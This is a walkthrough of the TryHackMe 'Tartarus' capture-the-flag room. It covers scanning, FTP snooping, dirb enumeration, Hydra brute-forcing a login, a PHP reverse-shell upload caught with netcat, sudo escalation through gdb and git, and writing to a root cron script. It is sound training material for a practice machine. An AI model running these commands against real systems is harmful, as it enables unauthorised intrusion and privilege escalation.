Tartarus- Walkthrough
This relatively easy ctf challenge can be found on the site TryHackMe.
Now we deploy the machine and scan it for any open ports. In this example, I used nmap.
> nmap -sC -sS -sV -O -A <machine_ip>
FTP, SSH, and HTTP are open for us. We will check FTP first to see if we can login anonymously.
When asked for a password, press the ENTER key.
Now for a little snooping. Using the ls command shows us one file called test.txt.
Reading it gives us nothing. Using ls -la on the other hand reveals more directories = *…
Enter that directory and rerun ls -a. Another weird directory. Keep going until you run into an actual file.
After downloading the file, read it and make note of the path you see.
Now that we know port 80 is open. lets enumerate to see any hidden directory. We will use a directory enumeration tool called DIRB to
find if any other files or folders exist.
Navigate to the paths found by using dirb. In the robos.txt directory there is a path listed in it and also a username.
When we navigate to the directory found in the robots.txt, There are two files available. One looks like a bunch of passwords and the other has possible usernames.
Copy the files manually or with wget.
> wget <URL>
So, let’s go to that path we found in the FTP file.
We encounter a login page. We can attempt to guess the credentials but there is a tool for that. We will use Hydra to check for
credentials using the two files we just copied over to our computer.
> hydra -L <username_file> -P <password_file> <domain/ip> http-form-post “<login page>:username=^USER^&password=^PASS^:Incorrect username!”
We have alot of credentials so lets narrow it down to
> hydra -l <username> -P <password_file> <domain/ip> http-form-post “<login page>:username=^USER^&password=^PASS^:Incorrect username!”
We have valid credentials! Login in and there is an upload page ready to be exploited.
To exploit this let’s upload something that will give us a reverse shell. Pentestmonkey has an excellent file called php-reverse-shell.php
we’ll navigate to https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and download the file to our machine.
Now after downloading the file edit it so that it uses your computer’s ip address and the port you want to listen to.
Upload the edited version. You’ll see that the upload was successful.
navigate to /images directory, this path holds our uploaded content. Before opening the file, go back to a terminal and prepare your end of the
reverse shell connection using netcat.
nc -nlvp <port>
Now go to your uploaded file from the browser and you should have a shell prompt on the terminal.
First flag found!
Let’s see about getting the root flag.
If you run sudo -l, you’ll see we can execute /var/www/gdb as the user thirtytwo.
So we will exploit this to gain a shell as that user.
> sudo -u thirtytwo /var/www/gdb -nx -ex ‘!sh’ -ex quit
GTFOBins is a great site for figuring out if a command can be exploited or not. I highly recommend taking a look there
https://gtfobins.github.io/
For the next part, we need to get an interactive shell.
> python -c ‘import pty;pty.spawn(“/bin/bash”)’
Then we can run sudo -l and see that thirtytwo can run /usr/bin/git as the user d4rckh.
We will exploit that with this command.
> sudo -u d4rckh /usr/bin/git help config
Once you get a prompt, saying (press RETURN), type this instead to get a new shell.
> !/bin/sh
Now we are d4rckh! We found our first flag in this user’s home folder so we will navigate there first. Run ls -la and we see there is a file called cleanup.py
owned by root that we can write to.
Reading the file, we notice we can have this script execute system commands with os.system(). Before we write anything, we need to see how to get the command to run as root.
Check out:
> cd /etc/crontab
The script we can abuse runs every two minutes as root.
Let’s carefully edit that script with a command to get us the root flag.
> echo “os.system(‘cat /root/root.txt > /home/flag; chmod 444 /home/flag’)” >> /home/d4rckh/cleanup.py
> tail cleanup.py
Now to get the root flag simply type this command
> cat ../flag
thanks for using my walkthrough.
regards
NIRU IFEDINIRU OZIOMA